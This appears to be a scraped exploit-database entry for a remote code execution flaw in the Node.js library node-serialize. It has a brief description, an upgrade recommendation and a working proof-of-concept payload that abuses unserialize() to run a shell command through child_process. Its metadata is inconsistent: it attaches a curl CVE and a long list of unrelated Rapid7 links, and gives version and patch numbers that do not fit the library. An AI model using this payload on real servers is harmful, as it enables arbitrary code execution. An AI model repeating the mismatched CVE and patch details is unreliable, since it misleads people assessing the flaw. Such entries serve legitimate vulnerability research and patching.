header-logo
Suggest Exploit
vendor:
Node-Serialize
by:
Security Researcher
7,8
CVSS
HIGH
Remote Code Execution
502
CWE
Product Name: Node-Serialize
Affected Version From: 3.0.0
Affected Version To: 3.0.1
Patch Exists: YES
Related CWE: CVE-2020-8177
CPE: node-serialize
Metasploit: https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-8169/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-8177/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2020-8177/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Node.js
2020

Node-Serialize Unserialize Remote Code Execution

Node-serialize is a Node.js library that provides an API for serializing and deserializing JavaScript objects. A vulnerability exists in the unserialize() function of the library, which allows an attacker to execute arbitrary code on the server. The vulnerability is caused by the lack of input validation when unserializing user-supplied data. An attacker can exploit this vulnerability by crafting a malicious payload and sending it to the server, which will then be unserialized and executed.

Mitigation:

Upgrade to version 3.0.2 or later of node-serialize.
Source

Exploit-DB raw data:

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);

Navigation

Suggest Exploit

Services By CQR